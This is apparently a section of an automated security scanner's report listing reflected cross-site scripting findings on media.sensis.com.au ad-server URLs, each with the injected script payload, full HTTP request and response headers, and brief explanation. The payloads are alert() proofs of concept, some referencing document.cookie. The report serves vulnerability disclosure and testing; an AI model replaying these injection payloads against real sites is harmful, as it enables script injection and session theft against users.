This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588?4abcb"><script>alert(1)</script>46cce4301c3=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:52 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 696 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dcb7"><script>alert(1)</script>de5f006c4b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver8dcb7"><script>alert(1)</script>de5f006c4b4/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://go.bigpond.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:17 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 469 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=00084B6131110CEB7467A4E961626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fefb4"><script>alert(1)</script>ced29f7a466 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_randomfefb4"><script>alert(1)</script>ced29f7a466=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://go.bigpond.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:18 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 671 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=000D787331120CEB1778D2E561626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.600. http://media.sensis.com.au/hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3177"><script>alert(1)</script>6beb5a613e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415?d3177"><script>alert(1)</script>6beb5a613e1=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://go.bigpond.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:14 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 472 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=00048683310E0CEB1949914761626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.601. http://media.sensis.com.au/hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8659e'-alert(1)-'13eb8f70bdf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415?8659e'-alert(1)-'13eb8f70bdf=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://go.bigpond.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:16 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 2448 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=0006633E31100CEB660BCC3B61626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 557b0"><script>alert(1)</script>bb252471257 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:45 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 432 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47686"><script>alert(1)</script>1e19f0fcce5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:46 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 432 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.604. http://media.sensis.com.au/hserver/acc_random=376434999900/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=942103891691 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38714"><script>alert(1)</script>1e4ab45adc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:44 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 435 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6427f"><script>alert(1)</script>cd5e996c04f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver6427f"><script>alert(1)</script>cd5e996c04f/acc_random=377552078934/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:30 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 511 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96f73"><script>alert(1)</script>1f9804549a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random96f73"><script>alert(1)</script>1f9804549a0=377552078934/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:31 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 511 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.607. http://media.sensis.com.au/hserver/acc_random=377552078934/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fbe4"><script>alert(1)</script>01cfc1bbbb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=377552078934/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?3fbe4"><script>alert(1)</script>01cfc1bbbb7=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:29 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 514 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccc78"><script>alert(1)</script>99b00bcabad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserverccc78"><script>alert(1)</script>99b00bcabad/acc_random=454005787339/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:33 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 503 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 419f5"><script>alert(1)</script>1d85051ff8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random419f5"><script>alert(1)</script>1d85051ff8d=454005787339/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:34 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 503 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.610. http://media.sensis.com.au/hserver/acc_random=454005787339/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bb5c"><script>alert(1)</script>57436f0d50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=454005787339/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?2bb5c"><script>alert(1)</script>57436f0d50=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:32 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 505 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db963"><script>alert(1)</script>4c8856cbb4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserverdb963"><script>alert(1)</script>4c8856cbb4e/acc_random=469307811793/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:38 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 517 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67607"><script>alert(1)</script>a4421dd3bec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random67607"><script>alert(1)</script>a4421dd3bec=469307811793/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:40 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 517 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.613. http://media.sensis.com.au/hserver/acc_random=469307811793/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a11b5"><script>alert(1)</script>d321bb28ecc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
